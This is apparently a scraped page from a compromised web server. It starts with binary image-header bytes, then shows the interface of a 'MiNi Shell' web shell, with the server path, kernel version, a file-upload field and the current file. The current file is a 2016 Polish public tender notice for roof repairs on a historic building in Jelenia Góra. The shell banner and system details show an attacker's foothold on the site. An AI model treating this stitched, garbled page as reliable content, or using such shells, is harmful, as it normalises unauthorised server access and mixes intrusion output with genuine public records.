JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160417/94480-N-2016.html

<p class="kh_header"><b>Jelenia Góra: REMONT DACHU W RAMACH PROJEKTU
PN. REMONT DACHU I ELEWACJI DAWNEGO BUDYNKU KOLEGIUM JEZUICKIEGO 
W JELENIEJ GÓRZE

Część III:  KONTYNUACJA WYMIANY ZNISZCZONEGO POKRYCIA POŁACI DACHOWEJ</b><br>
<b>Numer ogłoszenia: 94480 - 2016; data zamieszczenia: 17.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Karkonoskie Stowarzyszenie Edukacyjne u Erazma i Pankracego w Jeleniej Górze , ul. Kopernika 1, 58-500 Jelenia Góra, woj. dolnośląskie, tel. +48 500183198.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sep.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DACHU W RAMACH PROJEKTU
PN. REMONT DACHU I ELEWACJI DAWNEGO BUDYNKU KOLEGIUM JEZUICKIEGO 
W JELENIEJ GÓRZE

Część III:  KONTYNUACJA WYMIANY ZNISZCZONEGO POKRYCIA POŁACI DACHOWEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest  kontynuacja wymiany zniszczonego pokrycia połaci dachowej budynku dawnego Kolegium Jezuickiego, zlokalizowanego przy ul. Kopernika 1 w Jeleniej Górze, w zakresie
oznaczonym w Przedmiarze robót jako Etapu II.
Dawny budynek Kolegium Jezuickiego usytuowany jest na parceli przylegającej do odcinka dawnych murów obronnych starego Miasta. Jest to budowla późno barokowa założona na planie podkowy. Obecnie część objętą przedmiotem zamówienia jest wyłączona z użytkowania.
Budynek jest wpisany do rejestru zabytków pod nr A.2128.649.J z 04.08.1980.
  Na realizację zadania Zamawiający posiada Decyzję nr 760.12 z 17.07.2012 r. udzielającą pozwolenia na prowadzenie prac przy zabytku, wydaną przez Dolnośląskiego Wojewódzkiego Konserwatora Zabytków we Wrocławiu oraz Decyzję nr 287.2012 z 30.07.2012 r. zatwierdzającą projekt budowlany   i udzielającą pozwolenie na budowę, wydana przez Prezydenta Miasta Jeleniej Góry.
Zakres rzeczowy robót budowlanych objętych postępowaniem obejmuje w szczególności : roboty rozbiórkowe: kominy 1,8 m3,   demontaż okien połaciowych 3 szt.,  rozebranie pokrycia z blachy miedzianej nie nadającej się do użytku 324,5m2, rozebranie rynien z blachy  45mb  i rur z blachy  48mb;
 rekonstrukcja więźby dachowej m.in. przemurowanie kominów  1,8m3 z zabezpieczeniem siatką bocznych otworów, wymiana elementów drewnianych ok.2m3 drewna, membrana dachowa  łącznie ok. 670m2, ocieplenie stropu poddasza wełną mineralną gr. 15cm  335m2, przewody wentylacyjne ok.36m, wywietrzaki dachowe;
 rekonstrukcja dachu: pokrycie dachów blachą miedzianą gr. min. 0,6mm 315m2, pokrycie dachów papą  termozgrzewalną 80m2, akcesoria do pokryć dachowych, w tym płotek przeciwśniegowy70mb, montaż okien połaciowych 78x140  3 szt., montaż okna wyłazowego 78x140 1 szt. i wyłazu dachowego 85x85  1 szt.;
rekonstrukcja obróbek blacharskich m.in. obróbki z blachy miedzianej ok.39m2, rynny dachowe miedziane 45mb, rury spustowe z PCV  48mb, instalacja odgromowa ok.100mb z wykonaniem badań skuteczności ochrony; wykonanie lukarn_ elementy drewniane ok. 2,8m3, poszycie ścian lukarn płyta wiórowa6,2m2, pokrycie dachów blachą; niezbędną  naprawę gzymsów przed założeniem obróbek blacharskich.
Niniejszym postępowaniem objęta jest kontynuacja wymiany pokrycia dachu powierzchni na około 315 m2 i lukarn na powierzchni 20m2, na pokrycie z blachy miedzianej łącznie z wymianą całości  deskowania pod istniejącym pokryciem z blachy, na deskowanie z drewna iglastego gr. 2,8cm z założeniem folii paroprzepuszczalnej na krokwiach oraz kontrłat 6x5cm celem wytworzenia  przestrzeni wentylacyjnej.  Ponieważ obróbki blacharskie okapów zostały przerwane dla montażu rynhaków, a tym samym umożliwiały penetrację wód opadowych Wykonawca musi liczyć się z potrzebą wymiany skorodowanych końcówek krokwi.
Zakres połaci dachowej do wymiany objęty postępowaniem został zaznaczony na Rzucie dachu kolorem czerwonym - jako Etap II.   i kolorem zielonym  jako Etap III.  plik oznacz. jako 4. Wszystkie elementy obróbek blacharskich do wymiany jak i projektowanych,  dot. lukarn, w szczególności  opierzenia  kominów, rynny, i koryta odpływowe należy wykonać z blachy miedzianej gr. min.0,6;  rury spustowe  do wymiany na PCV. Przewody wentylacyjne należy wykonać  w technologii giętych rur stalowych w otulinie z wełny mineralnej, które obudowane do klasy EI 60 zostaną   wyprowadzone na dach w postaci systemowych kominków wentylacyjnych lub kominów zgodnie z rysunku 8.A.16, stanowiącym plik oznaczony jako 5.
Obudowa w klasie EI 60 dotyczy również obudowy powyżej sufitu podwieszanego nad poddaszem.
W zakresie wykonawcy jest wykonanie robót budowlanych ponad połacią dachu, z nw. wyjątkiem, w sposób umożliwiający późniejsze wpięcie pozostałej części  elementów przez  wykonawcę wykonującego roboty wewnętrzne  w budynku, w tym instalacyjne,  poza zakresem niniejszego postępowania.
W zakresie objętym postępowaniem jest rozbiórka kominów, przemurowania kominów oraz obudowa przewodów, powyżej połaci dachowej- zgodnie z rysunku 8.A.16, stanowiącym plik oznaczony jako 5.
Do wykonania  lukarny  , okna połaciowe i okno wyłazowe   78x140cm  oraz wyłaz dachowy- 85x85cm . Wykonawca powinien  uwzględnić  ewentualną  konieczność wykonania dodatkowych wymianów pod nowe okna połaciowe i wyłazy dachowe.
W zakresie Wykonawcy jest dostawa i montaż okien połaciowych, okien wyłazowych i wyłazów dachowych. Dostawa i montaż okien w lukarnach  nie jest w zakresie niniejszego postępowania. 
Do wykonawcy należy zabezpieczenie otworów płytą wodoodporną. 
Rozmieszczenie okien połaciowych, okien oddymiających i wyłazów, lukarn  zawiera rysunek 8.A.16, stanowiący plik oznaczony jako 5.
Instalację odgromową należy wykonać w postaci zwodów poziomych nienaprężonych, drutem miedzianym fi 8mm na odstępnikach naciągowych, minimum 40 cm od pokrycia dachu. Zwody pionowe  wykonać jako naprężające  z drutem miedzianym fi 8mm, naprężane na wspornikach u szczytu i na wysokości parteru od strony zewnętrznej budynku ,wspornik dolny mocowany do wysokości 1,80m. Od strony wejść do budynku  przewody 
odprowadzające należy doprowadzić do poziomu parteru, ,wsporniki mocowane  do wysokości 1,80m, jak wyżej .Przewody odprowadzające należy naprężyć na dole śrubą naciągową i poprzez złącze kontrolne połączyć   
z przewodami uziemiającymi przyspawanymi do uziomu budynku. 
Wymiana instalacji odgromowej dotyczy tylko części budynku, na którym wykonywana jest wymiana połaci dachowej objęta niniejszym postępowaniem. Wykonana nowa instalacja odgromowa wraz z pozostałą instalacją odgromową musi zapewnić skuteczna ochronę przed uderzeniem pioruna, co oznacza, że  instalacja odgromowa  na budynku musi tworzyć jedną całość. 
W przypadku, gdyby zmierzona wypadkowa rezystancja uziemienia i innych połączonych z nim urządzeń przekraczała wartość dopuszczalną (powyżej30 om)  należy wykonać uziomy sztuczne. W takim przypadku rezystancja uziomu sztucznego powinna być mniejsza niż dwukrotna wartość wymagana dla danego typu uziomu.
Fragment poglądowy sposobu dotychczasowego  poprowadzenia instalacji odgromowej pokazany jest na rys.10.E.15 rzut dachu_instalacja odgromowa, stanowiącym plik oznacz. jako 9.Szczegółowy zakres prac Etapu II. pokazy jest na rysunku 8.A.16, stanowiącym plik oznaczony jako 5 .
Wymagany okres gwarancji jakości  i rękojmi za wady fizyczne,  dla całego przedmiotu zamówienia  - minimum 60 miesięcy , licząc od dnia podpisania  bezusterkowego protokołu odbioru przedmiotu zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.00.00-7, 45.26.10.00-4, 45.26.11.00-5, 45.26.12.10-9, 45.26.14.10-1, 45.26.26.50-2, 45.31.23.10-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Każdy wykonawca zobowiązany jest zabezpieczyć składaną ofertę wadium w wysokości:  7 000 PLN    (słownie: siedem tysięcy złotych ).
2. Wadium może być wniesione w następujących formach:
a)	 pieniądzu,b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z  tym, że    poręczenie kasy jest zawsze poręczeniem pieniężnym,c)	  gwarancjach bankowych,d)	  gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 09.11.2000 r.  o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z 2007r. Dz. U. Nr 42,  poz. 275,  z późniejszymi zmianami).

3.  W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń  -  dokumenty te powinny    być sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:
a)	 nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji lub poręczenia ( Zamawiającego),  
  gwaranta ( banku lub instytucji udzielających gwarancji lub poręczenia ) oraz wskazanie ich siedzib; b)	  określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem;c)	  kwotę gwarancji lub poręczenia;d)	  termin ważności gwarancji lub poręczenia ;e)	  zobowiązanie gwaranta do bezwarunkowego i nieodwołalnego zapłacenia  kwoty gwarancji lub  
        poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie :
 że  wykonawca,  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3 upzp.  nie złożył dokumentów lub oświadczeń, o których mowa w art.25.ust.1 upzp. lub  pełnomocnictw, a nie udowodnił, że nie wynikało to z przyczyn leżących po jego stronie,
lub
 że wykonawca ,  którego ofertę wybrano:
      odmówił podpisania umowy na warunkach określonych w ofercie,     lub  nie wniósł zabezpieczenia należytego wykonania umowy,    lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.

W przypadku, gdy gwarancje lub poręczenia nie będą zabezpieczały w pełnym zakresie możliwych roszczeń Zamawiającego - Wykonawca zostanie wykluczony z postępowania. 4.   Wadium w formie gwarancji  lub poręczeń  nie podlega  przeniesieniu na osoby trzecie. 5.  Wadium wnoszone w pieniądzu należy wpłacić - wyłącznie przelewem na rachunek Zamawiającego,  otwarty    w  PLN : PKO BP 1 Oddział Jelenia Góra 30 1020 2124 0000 8402 0137 1467 z adnotacją w tytule wpłaty :   Wadium - Część III.  kontynuacja_ remont dachu.

6. Wadium w innej, niż pieniądz dopuszczonej  przez Zamawiającego, formie _formach wykonawca może  dołączyć do oferty - pod warunkiem,  że umieszczone zostanie w osobnej  kopercie  z podaną nazwą wykonawcy    i adnotacją: Wadium - Część III. kontynuacja_ remont dachu.  

7.  Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium  w  pieniądzu  za pomocą  przelewu bankowego Zamawiający będzie uważał za skuteczne wówczas, gdy Bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
Dołączenie do oferty kopii polecenia przelewu wystawionego przez wykonawcę jest niewystarczającym warunkiem do stwierdzenia, przez Zamawiającego, terminowego wniesienia wadium przez wykonawcę.

8.   Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 upzp.

9.  Zamawiający  zatrzymuje  wadium  wraz  z odsetkami,  jeżeli  Wykonawca w  odpowiedzi  na wezwanie,             o którym  mowa w art.26 ust.3 upzp., z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art.25 ust.1 upzp., pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art.24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.87 ust.2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.       10.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
a)    odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;  b)    nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; c)    zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po  stronie wykonawcy.

11. W przypadku, kiedy wnoszone wadium  w postaci gwarancji bankowych bądź ubezpieczeniowych  dotyczy zabezpieczenia oferty składanej  przez wykonawców ubiegających się wspólnie o udzielenie zamówienia -             w treści  gwarancji bankowych bądź ubezpieczeniowych  muszą znajdować się wszystkie podmioty (konsorcjanci) wymienieni jako wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest do przedłożenia _Wykazu wykonanych robót budowlanych_ w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania, z załączeniem dowodów dotyczących najważniejszych robót oraz realizacji wykazanych na potwierdzenie spełnienia warunku udziału w postępowaniu, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 

Zamawiający żąda również wskazania w ww. Wykazie INFORMACJI O ROBOTACH BUDOWLANYCH NIEWYKONANYCH LUB WYKONANYCH NIENALEŻYCIE  i ich przyczynach , w celu zweryfikowania rzetelności i kwalifikacji wykonawcy.






Decyzja, które  roboty budowlane widniejące w ww. Wykazie są najważniejsze, pozostawiona jest do decyzji wykonawcy, z zastrzeżeniem treści zdania następnego. 

Zamawiający uzna warunek za spełniony w oparciu o złożone przez wykonawcę stosowne oświadczenie      i wykazane w ww. Wykazie realizacje, z których co najmniej dwie(2)  dotyczą robót budowlanych polegających na budowie i/lub przebudowie i/lub remoncie dachów wielospadowych o konstrukcji drewnianej,  w których zakres rzeczowy, w każdym, obejmował co najmniej: 
- pokrycie dachu z blachy na powierzchni minimum 200m2, w tym chociaż  jedno pokrycie stanowiła  blacha miedziana, 
- wykonanie konstrukcji drewnianych więźb dachowych lub przy więźbach dachowych (np. lukarny),
- wykonanie  instalacji odgromowej. 
        
Zgodnie z art.3  słownika ustawy z 07.07. 1994  Prawo Budowlane przez pojęcia:
      - budowa należy rozumieć wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę,       
        rozbudowę, nadbudowę obiektu budowlanego;
     - obiekt budowlany - należy rozumieć budynek, budowlę bądź obiekt małej architektury, wraz z instalacjami   
       zapewniającymi możliwość użytkowania obiektu zgodnie z jego przeznaczeniem, wzniesiony z użyciem   
       wyrobów budowlanych;
     - przebudowa- należy rozumieć wykonywanie robót budowlanych, w wyniku których następuje zmiana 
       Parametrów użytkowych lub technicznych istniejącego obiektu budowlanego, z wyjątkiem  
       charakterystycznych parametrów, jak: kubatura, powierzchnia zabudowy, wysokość, długość, szerokość 
       bądź liczba kondygnacji;
    - remoncie - należy przez to rozumieć wykonywanie w istniejącym obiekcie budowlanym robót budowlanych 
       polegających na odtworzeniu stanu pierwotnego, a niestanowiących bieżącej konserwacji, przy czym 
       dopuszcza się stosowanie wyrobów budowlanych innych niż użyto w stanie pierwotnym;


Dowodami są poświadczenia lub inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym
charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. Wykonawca jest zobowiązany podać obiektywne przyczyny, jeżeli korzysta z tej drugiej formy dowodów.
Ww. dowody muszą być wydane przez podmiot na rzecz, którego te roboty budowlane zostały wykonane. 
W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wykonane wcześniej, Wykonawca nie ma obowiązku przedkładania ww. dowodów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia w szczególności osobę odpowiedzialną za kierowanie robotami budowlanymi, tj.
                     Kierownika Budowy   posiadającego :
        - doświadczenie zawodowe na stanowisku kierownika budowy, nabyte na co najmniej trzech(3) realizacjach  związanych z robotami budowlanymi polegającymi na kryciu blachą połaci dachowych, w tym co najmniej na jednej(1)  realizacji, w której materiałem pokrywczym była blacha miedzianą, 
       - uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności          konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,        
         -  odbytą co najmniej dwuletnią(2)  praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych 
            do rejestru zabytków.

Zamawiający uzna warunek za spełniony w oparciu o złożone przez Wykonawcę stosowne oświadczenie         i Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnej za kierowanie robotami budowlanymi.







Zgodnie z art. 12a ustawy z 07.07.1994 r. Prawo budowlane samodzielne funkcje techniczne                           w budownictwie, określone w art. 12 ust. 1 cyt. ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych a w szczególności ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych               w państwach członkowskich Unii Europejskiej (Dz.U.2016 poz.65 z 16.01.2016 r.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże: 
a)	dysponowanie środkami finansowymi lub posiadaną zdolnością kredytową (lub środkami finansowymi      i zdolnością kredytową)  - w wysokości co najmniej 100 000  PLN;

b)	że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej               z przedmiotem zamówienia na kwotę minimum  250 000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>co najmniej dwie(2)  dotyczą robót budowlanych polegających na budowie i/lub przebudowie i/lub remoncie dachów wielospadowych o konstrukcji drewnianej,  w których zakres rzeczowy, w każdym, obejmował co najmniej: 
- pokrycie dachu z blachy na powierzchni minimum 200m2, w tym chociaż  jedno pokrycie stanowiła  blacha miedziana, 
- wykonanie konstrukcji drewnianych więźb dachowych lub przy więźbach dachowych (np. lukarny),
- wykonanie  instalacji odgromowej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

